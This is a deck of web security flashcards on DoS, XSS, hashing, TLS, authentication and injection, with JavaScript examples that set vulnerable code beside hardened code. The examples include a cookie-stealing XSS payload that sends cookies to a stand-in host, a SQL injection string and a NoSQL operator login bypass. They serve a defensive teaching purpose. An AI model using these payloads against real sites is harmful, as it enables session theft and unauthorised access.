Security Flashcards

1
Q

What is a DDoS attack?

A

Distributed Denial of Service attack

A DoS attack in which the flooding traffic comes from many different sources (often a botnet of compromised machines), so it cannot be stopped by blocking one address and is much harder to defend against

2
Q

What is a DoS attack?

A

Denial of Service attack

An attack in which the attacker tries to make a system unavailable to its legitimate users, most often by flooding it with more traffic or requests than it can handle (exhausting bandwidth, CPU, memory or connection slots)

3
Q

What is XSS and how does it occur?

A

Cross-Site Scripting

A security vulnerability typically found in web apps

Occurs when an app takes untrusted data and includes it in a page sent to the browser without proper validation and output encoding, so the data is interpreted as markup or script

Allows attackers to execute scripts in the victim's browser within the origin of the vulnerable site; the script can read any cookies not marked HttpOnly, steal session tokens, act on the user's behalf, or redirect users to malicious sites

4
Q

What are some ways to prevent XSS?

A
  • Validate all input (type, length, format), but don't rely on input filtering alone; output encoding is the primary defence
  • Add a Content Security Policy
  • Set the HttpOnly flag on session cookies (e.g. via middleware) so script can't read them; an XSS that does get through then can't steal the cookie, although it can still act on the user's behalf from within the page
  • Encode output for the context it is inserted into: in an HTML body encode characters such as < > & " ' so untrusted data is rendered as text rather than tags; JavaScript, attribute and URL contexts each need their own encoding
  • Encode on both server and client: server-side encoding covers reflected and stored XSS, while client-side code must still avoid dangerous DOM sinks (innerHTML, document.write) or encode before using them, to mitigate DOM-based XSS as well
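Added example, not part of the original deck: HTML-context output encoding and an HttpOnly session cookie, the two mitigations above that are most often got wrong. The comment markup, the `escapeHtml`/`renderComment*` function names and the attacker payload are constructed for illustration.

```javascript
// Encode the five characters that can break out of an HTML text or attribute
// context. Ampersand goes first so already-encoded output is not double-encoded.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable: the comment body is spliced straight into the markup.
function renderCommentVulnerable(comment) {
  return `<li class="comment">${comment}</li>`;
}

// Hardened: same template, but the untrusted value is encoded for the HTML
// body context, so the browser shows it as text instead of parsing it as tags.
function renderCommentSafe(comment) {
  return `<li class="comment">${escapeHtml(comment)}</li>`;
}

// Build a Set-Cookie header for the session cookie. HttpOnly keeps it out of
// document.cookie, Secure restricts it to HTTPS, SameSite=Lax blunts CSRF.
function sessionCookieHeader(name, value, maxAgeSeconds) {
  // Session IDs are server-generated; refuse anything that is not a plain token.
  if (!/^[A-Za-z0-9_-]+$/.test(value)) throw new Error('unexpected cookie value');
  return `${name}=${value}; Max-Age=${maxAgeSeconds}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed attacker input: a classic cookie-stealing payload.
const payload = `<img src=x onerror="fetch('https://evil.example/?c='+document.cookie)">`;

function demo() {
  console.log(renderCommentVulnerable(payload)); // the <img> tag survives: XSS
  console.log(renderCommentSafe(payload));       // rendered as harmless text
  console.log(sessionCookieHeader('sid', 'c2Vzc2lvbi1pZA', 3600));
}
demo();
```

Even with `escapeHtml`, data placed inside a `<script>` block, an `onclick=` attribute or a `href` needs that context's own encoding; this helper only makes the HTML body context safe.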
5
Q

What is the role of SSL certificates?

A

SSL (now TLS) certificates let a client verify that the server it is talking to really controls the domain name it claims: the certificate binds the server's public key to its hostname and is signed by a certificate authority the client already trusts. Once the client has checked the signature chain, the validity period and that the hostname matches, the certificate's key is used in the TLS handshake to agree session keys and set up an encrypted, integrity-protected channel

6
Q

What is a salt?

A

Random, per-user data (not a timestamp, which is predictable) that is stored alongside the hash and combined with the password before hashing. It ensures two users with the same password get different hashes and defeats precomputed (rainbow) tables, so each hash has to be attacked separately. It does not prevent true hash collisions, which are a property of the hash function itself

7
Q

What are some of the top vulnerabilities in modern web?

A
  • XSS
  • SQL injection
  • Sensitive data exposure
  • Broken authentication and broken access controls
8
Q

What is a hashing collision? Provide an example

A

Where two different inputs generate the same hash output

For a sound hash such as SHA-256 finding a collision is computationally infeasible; for broken hashes such as MD5 and SHA-1 real collisions have been demonstrated, which is why they must not be used for signatures or integrity checks

Note that two users choosing the same password is not a collision (same input, same hash), but an unsalted store reveals that their passwords match; a per-user salt is what prevents that

9
Q

What do encryption and decryption mean?

A

Encryption
Turning readable data (plaintext) into unreadable data (ciphertext) using a key

Decryption
Turning the ciphertext back into the original plaintext using the corresponding key

10
Q

What is the difference between hashing and encryption?

A

Hashing is one-way: the original input cannot be recovered from the digest, only guessed and re-hashed for comparison

Encryption keeps data secret but recoverable: anyone holding the right key can decrypt it

11
Q

What is CSP?

A

Content Security Policy

Browser-side mechanism that lets developers allowlist the sources from which client-side resources (JavaScript, CSS, images, frames, etc.) may be loaded

Delivered via the Content-Security-Policy HTTP response header (or a <meta> tag); the browser refuses to load or execute anything not on the allowlist. With a script-src directive, inline scripts are blocked unless they carry an allowed nonce or hash, which is what blunts XSS

12
Q

How does injection occur and what types are there?

A

Injection occurs when untrusted data is sent to an interpreter as part of a command or query, so that what should have been data is parsed and executed as code

Types:

  • SQL (and NoSQL) injection
  • JavaScript injection (eval() and similar)
  • OS command injection
13
Q

What are some authentication handshake strategies?

A
  • Key-based authentication
  • OAuth
  • SSO
14
Q

How does key-based authentication work?

A

The client proves possession of a secret key instead of typing a password: for example an SSH key pair (the server holds the public key and challenges the client to sign with the private one) or an API key sent with each request. It avoids passwords but moves the burden onto the client to keep the private key or API key secret and to rotate it if it leaks

15
Q

How does OAuth work?

A

The website redirects the user to a third-party provider where the already-logged-in user confirms which details or permissions they are willing to share with the new site; the provider then hands the site a token it can use, so the site never sees the user's password

Strictly, OAuth is an authorisation (delegation) protocol; the "log in with" use case layers OpenID Connect on top of it

Used by Facebook, Google, Twitter

16
Q

What is the difference between a cookie and a session?

A

Cookie
Data stored by the browser and sent to the server automatically on every request to the matching site

Session
Data stored on the server and associated with a given user, usually looked up by a session ID that the browser carries in a cookie

17
Q

What is the difference between session-based vs token-based authentication?

A

Session-based
After the client authenticates, the server creates a server-side session record and returns its unique, random session ID (typically stored in a cookie), which the browser attaches to subsequent requests; the server looks the ID up to identify the user

Token-based
After the client authenticates, it receives a signed token (e.g. a JWT) that identifies the client and can also carry additional claims; the server verifies the signature instead of looking up stored state

Tokens are sent in the HTTP Authorization header as a bearer token on subsequent requests

Used for OAuth and SSO strategies

18
Q

What are the pros and cons of session-based authentication?

A

Pros

  • Small: only an opaque session ID travels to the client
  • Easy to implement, and easy to revoke (delete the server-side record)

Cons

  • Because the cookie is sent automatically, the session is exposed to CSRF unless SameSite or anti-CSRF tokens are used, and to theft via XSS unless the cookie is HttpOnly
  • Session state lives in the server's memory or a shared store, which makes horizontal scaling harder (sticky sessions or a central store such as Redis)
19
Q

What are the pros and cons of token-based authentication?

A

Pros

  • Stateless: the server needs only the signing key to validate a token, not a session store
  • Stored on the client, so no server-side state; scales horizontally and works across services and domains
  • Can carry claims (user ID, roles, expiry), so a resource server can authorise without a lookup

Cons

  • A compromised signing key lets an attacker forge tokens for any user
  • Larger than a session ID, and sent on every request
  • Cannot be revoked before expiry without reintroducing server-side state, so lifetimes are kept short (annoying for users to regularly re-authenticate; refresh tokens are added to combat this)
  • If stored in localStorage rather than an HttpOnly cookie, readable by any XSS on the page
20
Q

Why is it better to hash passwords rather than encrypt them?

A

If someone steals the key used to encrypt the passwords (and the server must hold that key to check logins), they can decrypt every password at once

A hash cannot be decrypted: with a slow, salted password hash (bcrypt, scrypt, Argon2) an attacker who steals the database can only guess candidate passwords and hash each one, and each user's salt forces that work to be repeated per account, so strong passwords stay out of reach even after a leak

21
Q

What are the differences between symmetric vs asymmetric encryption?

A

Symmetric encryption
Data is encrypted and decrypted with the same key, so every authorised party must hold a copy of that key; fast, and used for bulk data

If the key is compromised, all data encrypted under it can be decrypted

Asymmetric encryption
Each party has a key pair: a public key that can be shared freely and a private key that is kept secret

Data encrypted with a public key can only be decrypted with the matching private key

To send an encrypted message, you encrypt with the recipient's public key and only the recipient can decrypt it with their private key. In practice the two are combined: asymmetric encryption protects a fresh symmetric key, and that key encrypts the actual data (this is what TLS does)

22
Q

How does SQL/NoSQL injection work?

A

The attacker supplies input that is interpreted as part of a database query rather than as a value, so the database executes attacker-chosen logic

Caused by building queries dynamically from user input with string concatenation, or (for NoSQL stores) passing user-controlled objects straight into the query

ie. a search field whose value is spliced into the query without sanitisation: the input ' OR '1'='1 turns the WHERE clause into one that matches every row

23
Q

How can we prevent SQL/NoSQL injection?

A
  • Use prepared statements / parameterised queries instead of string concatenation, so user data is bound as a value and never becomes part of the query text
  • Validate and type-check user input; for NoSQL, reject objects where a string is expected, since a body such as {"password": {"$gt": ""}} would otherwise become a query operator
  • Apply the principle of least privilege to the database account, so a successful injection can't read other tables, write files or drop data
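Added example, not from the original deck, covering cards 22 and 23: a NoSQL login filter that passes a client-supplied object through beside one that enforces scalar types and strips operator keys, and a SQL search written with concatenation beside the parameterised form. The request bodies, the `{text, values}` query shape and the function names are constructed for illustration.

```javascript
// Vulnerable: whatever the client sent becomes the filter. With the JSON body
// {"username":"admin","password":{"$ne":""}} the password clause matches any
// value, so the query returns the admin record without knowing the password.
function loginFilterVulnerable(body) {
  return { username: body.username, password: body.password };
}

// Hardened: enforce the scalar type the schema expects before building the filter.
function requireString(value, field) {
  if (typeof value !== 'string') throw new TypeError(`${field} must be a string`);
  return value;
}

function loginFilterSafe(body) {
  return {
    username: requireString(body.username, 'username'),
    password: requireString(body.password, 'password'),
  };
}

// Defence in depth for bodies that legitimately nest objects: drop keys that the
// database would read as operators ($gt, $where, ...) or as dotted field paths.
function stripOperators(value) {
  if (Array.isArray(value)) return value.map(stripOperators);
  if (value !== null && typeof value === 'object') {
    const clean = {};
    for (const [key, inner] of Object.entries(value)) {
      if (key.startsWith('$') || key.includes('.')) continue;
      clean[key] = stripOperators(inner);
    }
    return clean;
  }
  return value;
}

// SQL: the vulnerable form splices the term into the statement text; the safe
// form keeps the text fixed and hands the value to the driver as a parameter,
// so a quote in the input stays data. A parameter can never close the string.
function searchQueryVulnerable(term) {
  return `SELECT id, name FROM products WHERE name LIKE '%${term}%'`;
}

function searchQuerySafe(term) {
  return { text: 'SELECT id, name FROM products WHERE name LIKE $1', values: [`%${term}%`] };
}

// Constructed attacker inputs.
const operatorBody = { username: 'admin', password: { $ne: '' } };
const sqlTerm = "x' OR '1'='1";
console.log(loginFilterVulnerable(operatorBody)); // operator reaches the database
console.log(stripOperators(operatorBody));        // { username: 'admin', password: {} }
console.log(searchQueryVulnerable(sqlTerm));      // WHERE clause is now always true
console.log(searchQuerySafe(sqlTerm));            // quote is inside a bound value
```

Stripping operators turns a malicious password object into an empty one, which then fails the type check; the type check is the real control and the stripping is a safety net for fields that do need to carry objects.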
24
Q

How can we prevent JavaScript injection?

A
  • Validate and sanitise user input
  • Never pass user input to eval(), new Function(), or the string form of setTimeout()/setInterval(); parse data with JSON.parse() instead
  • Enable "strict mode" in JavaScript, noting that it does not stop eval() running injected code; it only stops eval from leaking variables into the enclosing scope
25
Q

What are some functions vulnerable to JavaScript injection and why?

A

Vulnerable functions:

  • eval()
  • setTimeout()
  • setInterval()

Web apps that pass unvalidated user input to eval() let the attacker run arbitrary JavaScript in the page (or, in Node, on the server): steal data, call APIs as the user, or simply loop forever and allocate memory to cause a DoS

setTimeout() and setInterval() are indirectly vulnerable because, when their first argument is a string rather than a function, browsers compile and run that string just as eval() would (Node's timers reject a string argument)